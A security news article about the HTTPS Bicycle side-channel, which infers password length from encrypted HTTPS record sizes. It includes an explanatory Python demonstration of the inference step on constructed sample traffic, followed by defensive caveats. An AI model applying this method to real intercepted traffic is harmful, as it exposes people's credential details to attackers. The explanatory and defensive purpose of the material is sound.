HTTPS Bicycle: A new attack on the supposedly secure HTTPS communication protocol raises questions about the resilience of passwords, security researchers warn.
A new attack named HTTPS Bicycle can reveal the length of a person's private data, such as passwords and GPS coordinates, from a packet capture of HTTPS traffic.
The attack, discovered by security researcher Guido Vranken, puts serious topics back on the table for security experts: encryption, authentication, privacy and, more specifically, the security of passwords.
"It is commonly assumed that HTTP traffic protected with TLS does not reveal the exact sizes of its segments, such as the length of a cookie header, or the payload of an HTTP POST request that may contain variable-length credentials such as passwords. In this paper I show that the plaintext HTTP headers included in each request can be exploited to reveal the length of specific components (such as passwords) in particular requests (such as authentication to a web application)."
The attack exploits a property of stream-oriented cipher suites, such as those based on Galois/Counter Mode (GCM): they add no padding, so the ciphertext is exactly as long as the plaintext and the exact size of each encrypted request is known to a man-in-the-middle. Because a browser repeats the same headers on every request, an attacker who learns their combined length from one request with otherwise known content can subtract it from the length of the login request, and what remains is the length of the password.
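The following worked example, added here and not taken from Vranken's paper or code, shows the length-inference step end to end. A toy hash-based keystream stands in for AES-GCM (both are length-preserving, which is the only property the attack needs); the TLS 1.2 GCM record framing sizes are real, while the browser headers, the cookie, the username `alice`, the key and the `/login` paths are constructed sample values. The attacker is assumed to know the URL paths, the form field names and the victim's username, but nothing about the contents of the browser's headers.

```python
"""Constructed demonstration of the length-inference step behind HTTPS
Bicycle. The toy keystream stands in for AES-GCM, which is likewise
length-preserving: len(ciphertext) == len(plaintext). Not the paper's code."""
import hashlib
import itertools

# TLS 1.2 AES-GCM record framing; these sizes are fixed by the spec.
RECORD_HEADER_LEN = 5    # content type (1) + version (2) + length (2)
EXPLICIT_NONCE_LEN = 8   # per-record explicit nonce, sent in the clear
TAG_LEN = 16             # GCM authentication tag


def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Toy counter-mode keystream (assumption: a stand-in, not a real cipher)."""
    out = bytearray()
    for ctr in itertools.count():
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        if len(out) >= n:
            return bytes(out[:n])


def encrypt_record(plaintext: bytes, key: bytes, nonce: bytes) -> bytes:
    """XOR with the keystream (no padding) and frame as a TLS record:
    header || explicit nonce || ciphertext || tag."""
    ks = keystream(key, nonce, len(plaintext))
    ct = bytes(p ^ k for p, k in zip(plaintext, ks))
    payload = nonce + ct + b"\x00" * TAG_LEN   # tag value is irrelevant for lengths
    return b"\x17\x03\x03" + len(payload).to_bytes(2, "big") + payload


def plaintext_len(record: bytes) -> int:
    """What a passive observer learns from one record: the exact plaintext length."""
    return len(record) - RECORD_HEADER_LEN - EXPLICIT_NONCE_LEN - TAG_LEN


def build_request(method: str, path: str, headers: list, body: bytes = b"") -> bytes:
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


# --- victim side (constructed sample traffic) --------------------------------
BROWSER_HEADERS = [  # repeated verbatim by the browser on every request
    ("Host", "example.com"),
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/43.0"),
    ("Accept", "text/html,application/xhtml+xml"),
    ("Cookie", "session=constructed-sample-cookie-value"),
]
FORM_PREFIX = b"username=alice&password="
KEY = b"constructed-session-key"


def victim_traffic(password: bytes) -> tuple:
    """Two records as seen on the wire: GET of the login page, then the POST."""
    get = build_request("GET", "/login", BROWSER_HEADERS)
    body = FORM_PREFIX + password
    post = build_request("POST", "/login", BROWSER_HEADERS + [
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Content-Length", str(len(body))),
    ], body)
    return (encrypt_record(get, KEY, bytes(8)),
            encrypt_record(post, KEY, bytes(7) + b"\x01"))


# --- attacker side ------------------------------------------------------------
def infer_password_length(get_record: bytes, post_record: bytes) -> int:
    """The attacker knows the paths, the form field names and the username,
    but not the browser header contents. Returns the password length."""
    # 1. GET plaintext = request line + browser headers + blank line; only the
    #    header block is unknown, so its length falls out by subtraction.
    get_known = len("GET /login HTTP/1.1\r\n") + len("\r\n")
    browser_headers_len = plaintext_len(get_record) - get_known

    # 2. The POST adds two headers and the body. The digit count of the
    #    Content-Length value depends on the body length, so try each digit
    #    count and keep the self-consistent one (at most one can be).
    post_fixed = (len("POST /login HTTP/1.1\r\n") + browser_headers_len
                  + len("Content-Type: application/x-www-form-urlencoded\r\n")
                  + len("Content-Length: ") + len("\r\n") + len("\r\n"))
    total = plaintext_len(post_record)
    for digits in range(1, 6):
        body_len = total - post_fixed - digits
        if body_len >= 0 and len(str(body_len)) == digits:
            return body_len - len(FORM_PREFIX)
    raise ValueError("no self-consistent body length")


if __name__ == "__main__":
    records = victim_traffic(b"hunter2")
    print("inferred password length:", infer_password_length(*records))
```

Two caveats for practitioners. First, the leak is not specific to GCM: TLS 1.2 CBC suites pad to a 16-byte block boundary, which only coarsens the measurement. Second, the protocol-level fix is length hiding, which TLS 1.3 provides through optional record padding (RFC 8446, section 5.4); two-factor authentication reduces what an attacker can do with a known password length but does not stop the length from leaking.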
Carl Leonard, chief security analyst at Raytheon|Websense, commented:
"End users can expect their passwords to remain private when they interact with a website that uses encryption, but the HTTPS Bicycle attack shows that this is not the case. Knowledge is the attacker's power, and even small pieces of information can lead to a later, more sophisticated attack."
Leonard continued:
"The undetectable nature of this attack means that it is vital for webmasters to consider using strong passwords and two-factor authentication to eliminate the single point of failure. Finally, users need to make sure their passwords are strong enough, while webmasters and web platform developers need to ensure that they are fully informed and that all steps are taken to prevent this attack in the future."
More about the attack can be read at the link below.